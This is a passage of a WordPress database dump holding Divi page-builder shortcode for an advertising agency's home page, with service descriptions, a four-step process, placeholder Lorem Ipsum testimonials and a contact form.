header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy for success\" title_text=\"marketing strategy for success\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 16:42:09','2020-08-07 16:42:09','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(503,1,'2020-08-07 16:42:49','2020-08-07 16:42:49','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real 